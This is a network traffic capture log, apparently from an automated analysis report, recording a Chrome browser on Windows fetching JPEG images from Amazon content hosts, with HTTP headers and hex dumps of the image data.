                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-562,/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 05:33:43 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-562 /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Laundry_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 52bf0b7935ffde0b5e26a7e27e5fe4ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219302
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: ozLjehaB0piyeTsdVOZzKxkoD-O7WUrVwtnoH4qqMPstBZjj4lvqhw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC3545INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 02 07 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 b4 e9 3c cd 5c a2 81 95 66 9e 2b fb cd
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"4<\f+


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      92192.168.2.549822151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC611OUTGET /images/I/414Wkl-jqYL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6110
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: f03b8523-adb8-44f9-9b71-68a082ac4205
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 17 Jun 2024 02:28:41 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 31 Jul 2044 08:09:36 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 335840
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100108-IAD, cache-ewr-kewr1740061-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 03 06 07 02 08 01 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 04 01 03 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 01 a3 ea 67 64 71 21 db 5c 2b
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4,gdq!\+
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 6b 0e 69 91 01 44 c6 d1 06 ab 5d b5 84 3e 26 41 19 d8 62 f2 d4 8c fe 2e 57 5f f5 e3 f7 dc ad f6 21 6a 6d 0b e1 b4 58 4d 53 2f d9 db 9f dc 1f b6 fe 8d 6f e8 56 ff 00 89 7d c0 34 75 ff 00 29 fc 7c db 4d bb 82 b3 5d de 44 32 05 15 b6 36 b5 a0 fd 7c 49 f6 e8 b6 4a bb d8 e8 a0 60 77 bd 44 5a 8c 6a 6b ae 19 bf 29 3c 39 11 c9 de 19 ed f6 cb d0 f0 c9 d5 9e 1b 66 b0 dc b6 78 d3 62 0d e0 03 55 39 6a 2a 2a 2a 2a 7b ff 00 ff c4 00 23 11 00 01 02 06 01 05 01 00 00 00 00 00 00 00 00 00 01 02 11 00 03 04 05 12 30 32 14 21 33 40 41 70 ff da 00 08 01 02 01 01 08 00 fc 04 07 85 49 29 0f ba 9e dc ba 8c f0 16 3a 85 72 21 89 1b 6d 67 cb 09 5b bc 2b 91 db 6f 9e 11 9b f5 d2 7e 2f 91 da 95 b0 22 04 de e2 14 5d 44 fa 7f ff c4 00 22 11 00 01 03 04 01 05 01 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: kiD]>&Ab.W_!jmXMS/oV}4u)|M]D26|IJ`wDZjk)<9fxbU9j****{#02!3@ApI):r!mg[+o~/"]D"
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 89 10 30 ad cd 6a 60 b1 eb 1c 8b 57 a3 64 04 95 29 a7 23 75 00 eb 03 53 bf b3 03 d0 94 7f 80 48 14 e8 15 37 b3 40 8a 3e 8a aa c4 f0 15 f9 50 3b f6 42 22 01 a5 7d 23 d0 22 9f 66 83 f0 04 d7 78 c7 03 f2 16 18 ed 0e d2 45 53 8e 5f 84 11 4f b3 41 f9 00 51 a0 7d 02 29 f6 e0 92 74 0a 3f 40 41 1c fb 30 08 fa 0d 12 74 0a 34 48 20 8e 7d a0 1f 54 93 a0 51 fa 02 08 e7 da 01 f5 09 3a 07 f0 81 14 fb 27 41 e8 7f 00 e8 7e 00 2a bd 93 a0 f4 3f a8 22 af 64 e9 3d 0a 34 5e a0 8d 17 a9 57 b2 1b b8 97 2f 9f 27 08 d7 b7 4c 95 e1 e5 b5 45 66 9c 61 02 b9 bd 8a 8f ab a2 1f 76 5e 46 11 e2 f4 d5 41 ce 3a 6a 74 50 7f 3c 1f 04 a9 3d 98 ff 00 0f 83 03 ef 95 76 e7 67 97 8a e4 14 b1 31 7b 3f 00 c1 ba 19 d5 62 88 1a 71 1d 5d 5b aa 10 b8 39 99 24 e6 b5 4b 23 1a 91 26 bd 02 51 0d 7a e5 8c
                                                                                                                                                                                                                                                                      Data Ascii: 0j`Wd)#uSH7@>P;B"}#"fxES_OAQ})t?@A0t4H }TQ:'A~*?"d=4^W/'LEfav^FA:jtP<=vg1{?bq][9$K#&Qz
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 00 c2 d5 72 5c d5 2f 72 db a0 bc 56 ee 6d 29 6f 9a 61 79 98 c8 d4 1e 40 e0 b9 d1 8e 51 17 50 8b 36 38 2e 61 fc 4b 8a 0a 9b 1c 07 a8 a6 72 a9 44 51 d8 70 1e a0 40 20 08 53 89 d8 70 1e a0 54 2d 2b 0d d6 21 3b f2 c7 f5 34 62 dd 2d fd 08 e7 19 01 ac 8d 5b 16 f6 f3 f4 46 a9 e9 8b 11 6b f9 95 2e 2f e0 58 38 b5 28 b3 d3 e8 85 78 59 a7 f0 71 cb 8c 14 86 96 90 13 e8 22 e5 01 10 79 53 d1 cd 72 d5 4b f7 2f 0d 24 71 c1 8b 12 86 7a 3e 88 87 8d 9a 46 28 e2 c9 8e 16 0e 47 87 42 93 d5 69 55 5c 94 08 8b b8 65 a4 aa 9b 9a 96 96 c3 2b 86 af 9e 57 f3 1c 50 62 c4 21 9e 8f a2 35 e3 66 91 8a 38 a5 ff 00 81 43 16 21 17 74 7d 10 af 1b 0d 45 8a 2f e0 3f 91 28 a2 c4 01 9e 8f a2 15 e3 66 91 47 fe 70 a1 c7 88 42 3d 1f 45 f0 d8 6a 28 f1 1f f8 8a 51 c7 88 42 3d 1f 45 8f 8d 83 8f e0 e2
                                                                                                                                                                                                                                                                      Data Ascii: r\/rVm)oay@QP68.aKrDQp@ SpT-+!;4b-[Fk./X8(xYq"ySrK/$qz>F(GBiU\e+WPb!5f8C!t}E/?(fGpB=Ej(QB=E
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC598INData Raw: 0c 30 96 0c 15 11 e4 fa bc 62 2e 79 a7 98 ca af c3 23 93 8d e1 79 95 71 6b a0 ce 28 1f 17 52 eb 58 fe 7b c6 d3 17 6a d0 25 c8 ff 00 f1 e6 98 ee 9b da 8a 6a f3 76 3a 7c e8 4c b4 56 3e 6f cd b7 db a6 86 98 3e 00 e9 d5 8a 51 77 90 b2 c2 e2 b2 fa dd d7 1d cb 94 d4 b5 62 da b9 f0 ff 00 37 f7 9a 45 d4 4c b7 4a 6b 16 bc b1 45 ba ca 5f 24 71 35 97 3b 51 ba 37 93 37 81 5a 6e 3b 26 05 44 b4 d5 ac 35 50 5c d7 11 c4 16 ae 34 16 81 df 25 f9 1e 71 bc 1f 0d 2d ea a9 2f 17 7d db de 85 5e a8 2e 3c 0a 30 6d 5b 5e 53 bb d2 07 95 44 00 dc da ad d0 e1 97 02 88 bb b6 50 a3 93 06 65 2c c6 ef 2a 95 c8 74 18 5a 35 22 ab 77 a1 6a 5d 76 b8 73 2d 8d c4 6e e0 03 74 7b 06 22 64 7c 3f 98 5a 28 5a 23 5b 62 e3 bf fb 72 fe f1 12 9c 61 ca e1 16 df 9b 4d 0a 97 34 d8 2c 1d c2 25 e1 c3 c4 ac
                                                                                                                                                                                                                                                                      Data Ascii: 0b.y#yqk(RX{j%jv:|LV>o>Qwb7ELJkE_$q5;Q77Zn;&D5P\4%q-/}^.<0m[^SDPe,*tZ5"wj]vs-nt{"d|?Z(Z#[braM4,%


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      93192.168.2.549824151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC471OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924078_186x116_1X_en_AE._SY116_CB566504241_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5698
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: f41fa45c-4302-4f4f-b06c-c1b6e4be7e05
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:38:54 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:18 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 118071
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100156-IAD, cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 07 08 09 02 04 0a 03 01 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 db 20 dc 79 dc 12 bc 5c 88
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9 y\
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: a7 5d c1 ad 56 89 07 8d 2a 08 62 6b 88 d3 b1 1d 74 d6 4b 1a 54 28 46 c4 95 92 d4 94 37 fe 1e 32 81 62 f5 a3 ee 20 ea ec c1 d3 59 e6 0a b2 c8 83 35 f6 7a d3 a5 a5 29 48 41 af fe 0f ff c4 00 2a 11 00 02 01 03 03 03 03 03 05 00 00 00 00 00 00 00 01 03 02 00 04 05 06 07 11 12 20 33 08 21 31 10 13 14 15 22 30 42 51 ff da 00 08 01 02 01 01 08 00 a9 1e 22 48 c8 6e f6 ac 55 f5 ca 97 6f ab 75 c5 d2 97 24 af 58 6b c9 b9 e8 a4 6a 8d 7e cc 9a f1 a6 7a 83 59 2e 10 2c c7 6a ad 79 90 30 95 67 37 0f 55 62 5e a4 af 6b f5 ae 67 3a ec 84 32 bf 52 39 04 55 e7 a7 3b 36 bd b7 13 b4 d9 8f c3 fb 31 49 d9 10 5e cb 9a 9e c8 c6 77 11 bb 9b f6 35 37 4b 82 ae 51 b2 50 b6 50 42 1d e9 fe ce e2 51 9b b4 76 d7 27 49 b2 e5 8a ec cd 78 61 46 51 a7 31 91 02 49 eb 64 bd d9 39 9e 68 47 fd 10
                                                                                                                                                                                                                                                                      Data Ascii: ]V*bktKT(F72b Y5z)HA* 3!1"0BQ"HnUou$Xkj~zY.,jy0g7Ub^kg:2R9U;61I^w57KQPPBQv'IxaFQ1Id9hG
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 71 3e 9d 5f 7c 7d 23 ab cf a3 b8 9f 4e af be 3e 91 0c 01 c9 f6 b1 6d c6 19 5b 92 97 2a 3e 41 a2 c4 6c 85 09 72 d2 a4 24 ce 5d 93 52 fb 29 f1 3b 7c 00 78 9d 29 61 39 97 a3 66 b6 ad ce ae 5f c7 40 75 4c 52 52 91 bc a8 b0 f9 c4 b4 b2 81 d6 d2 a1 92 37 aa f6 77 f9 c2 5a 55 74 ef 76 34 93 b9 9f 6f e0 ee 23 d3 ab ef 8f a4 40 22 f9 88 c4 94 a9 39 3c 92 a0 2d 46 c1 ba 0b a4 a9 92 5a 97 4a 05 29 b5 cd da 12 ba 34 e9 9b 2e 7c b6 ae 54 c4 8a 7b 25 c2 83 6c 63 18 fc 4e 25 4a 72 df d3 a1 0a 72 5c de 86 84 2e 5c 8e ea d4 16 b5 1c dd e9 0d e4 2d 01 f4 45 ec cf 91 6c ed 63 15 97 42 52 34 94 ab 45 48 a7 f2 86 48 b0 be 75 6d 89 7a 29 28 42 6a 1d a2 48 dc 77 3f e0 fd b4 7a 0e ac c8 a6 6a 9c 54 b5 85 64 05 d9 24 42 b0 fc eb f6 42 f0 fc cb f6 42 f0 dc cb f6 42 f0 dc eb f6 42
                                                                                                                                                                                                                                                                      Data Ascii: q>_|}#N>m[*>Alr$]R);|x)a9f_@uLRR7wZUtv4o#@"9<-FZJ)4.|T{%lcN%Jrr\.\-ElcBR4EHHumz)(BjHw?zjTd$BBBBB
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 50 f5 c0 62 e4 fe 10 30 46 a0 96 62 93 58 19 ca 67 d7 6f 92 a2 01 49 8e 70 b2 43 a4 f1 69 d9 a1 ba 62 16 8c ec ba 80 32 4a 90 62 13 40 7a 20 93 01 34 8c 1b de 6e 74 82 58 18 91 1c 4a 09 08 1a 3e 90 1b 0c cf 9c 5d 25 52 f1 39 c6 3c 37 e1 33 86 b9 c1 b4 65 b4 54 e4 ab fe 4a e0 72 2d 6c 7d d2 8a 4a 77 35 c6 46 a7 37 46 05 4b 13 ed a3 28 8e d3 54 01 a6 e3 4c 9c ef 04 82 f0 dd 53 4a 0f b9 ed b7 19 86 71 97 2e 72 51 5c 89 76 0a 39 ad 40 e9 3f 70 c6 9a b2 49 53 a6 97 6a bc 18 db 01 63 37 0f 21 b6 1e 9c 16 a6 00 4a 44 48 e9 10 91 e8 d7 0c de dc a8 08 d4 68 73 ee 9c fd f1 8f be 31 f7 2e 0e 17 ac 40 af 19 0f c1 c9 12 03 22 66 18 60 1d 05 d0 28 7b 23 7a 7c 2b d1 65 a0 96 86 ec 18 2c f7 39 91 a1 4c 28 6a 2c 26 f9 7c a0 25 aa 2c 99 b8 66 fb 0b 12 34 2d a8 28 39 62 1e
                                                                                                                                                                                                                                                                      Data Ascii: Pb0FbXgoIpCib2Jb@z 4ntXJ>]%R9<73eTJr-l}Jw5F7FK(TLSJq.rQ\v9@?pISjc7!JDHhs1.@"f`({#z|+e,9L(j,&|%,f4-(9b
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC186INData Raw: 18 b6 72 eb 5c 3e f6 79 29 ec b5 d9 b9 42 2a dd 70 cf 8b c5 7e 4d 74 33 a3 f7 0c e7 b4 b5 67 56 3f 69 e1 f4 3f 72 a4 54 81 78 26 3f aa c4 a4 2e fc 72 79 67 11 3e d4 1e af ab fd 15 8d 9d 4e d9 c8 19 c1 56 fb bc 92 01 c2 b8 1c e4 d2 25 7a a5 e1 f4 7f 27 c7 75 70 b4 ee d1 98 f1 a0 d6 46 4b 8c 6d ef 5e a9 78 7d 1f c9 f0 76 a9 65 2a e0 2e f5 3d 30 3f 2a f9 fb 46 9c 1a 5c f3 57 cd 6b d4 f8 66 42 2c 74 99 f7 2b a4 15 7e 35 74 94 81 9f d0 ab f1 5c 69 ab a6 6a f9 ca b8 65 7c 77 34 40 19 f1 05 44 d8 ab d9 58 b6 9c ca 3c 1f a5 5f 49 71 dd 8a 7d ab db fc 1f ff d9
                                                                                                                                                                                                                                                                      Data Ascii: r\>y)B*p~Mt3gV?i?rTx&?.ryg>NV%z'upFKm^x}ve*.=0?*F\WkfB,t+~5t\ije|w4@DX<_Iq}


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      94192.168.2.549829151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC432OUTGET /images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY304_CB567277961_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 13784
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 8383ea90-8227-4812-907e-280cdfbef870
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 15 Aug 2024 07:23:17 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Wed, 10 Aug 2044 14:51:07 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 430066
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200081-IAD, cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 04 02 03 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d2 8f a2 fa 40 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*0{"5@
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 00 00 00 00 00 00 00 00 03 67 ac 62 7b f8 25 b2 d8 47 5a f1 cf c0 33 9d 87 8e 2a 12 2d 4e 1a 20 36 65 bd c6 d5 aa e9 92 c6 8d 99 86 ec c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff c4 00 34 10 00 01 04 01 03 03 02 05 03 03 03 05 00 00 00 00 02 00 01 03 04 05 11 12 13 14 15 31 10 40 21 22 30 32 33 06 20 34 16 41 50 23 61 70 24 35 43 51 60 ff da 00 08 01 01 00 01 08 02 ff 00 92 60 ae 73 be 81 da a6 5d ae 65 da e6 5d ae 65 da e6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d ae 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 5d aa 65 da a6 53 d7 38 1f 43 f6 78 8f 12 7a 19 b0 36 a4 13 04 9f 6a 03 69 1b 51 fd e4 4c 2d ab 89 6e 66 76 fa b9 7f 11 fb 4c 47 db 27 a6 57 f0 12 81 9a 49
                                                                                                                                                                                                                                                                      Data Ascii: gb{%GZ3*-N 6e41@!"023 4AP#ap$5CQ``s]e]e]e]e]e]e]e]e]e]e]e]e]eS8Cxz6jiQL-nfvLG'WI
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 3d a6 23 cc be 99 2b 9d 24 5b d6 cb 93 83 d8 58 4c 81 cf ba 29 32 b9 29 0a 5e 08 4c ae 63 48 77 5c c8 69 53 9e 39 5a 7a 51 41 69 b2 97 b8 61 6d 94 e2 28 a3 11 91 4b 13 4a db 5e 3a 20 0e c4 8a b8 99 6a ed 40 36 18 2e 82 36 fb 02 98 09 ef f4 9e 3e 41 d1 9e 39 4b 69 ae 8c d9 9d 98 6a 3b 1e aa 28 0c 7e 1f b7 2d f8 c3 da 62 3c cb e9 3d 68 ec 36 92 64 67 0a 35 b6 0f e9 ca cf a9 cc b1 ff 00 35 e0 d7 f5 13 7f a3 13 ac 6d 66 b7 45 e2 2e d1 39 b0 04 f5 a4 19 e6 2b b2 d7 bb 0d 9d 78 d5 ca ad 6e 37 8c b2 58 c8 aa 6c 11 ca 56 e9 69 41 13 c7 87 a6 7a 0a f1 fb 2a dd 8a de ee 28 72 d5 e6 71 11 93 21 0c 7c 9a c7 7a 29 18 dd ab df 86 c6 ed b5 f2 10 d9 2d a1 e9 96 fc 61 ed 31 1e 65 f4 bd 70 69 c7 bd f9 da d4 db ec d1 c8 41 33 f1 43 3b 3d 0b 9a ac c6 48 2d 30 0c 78 a8 1e 0a
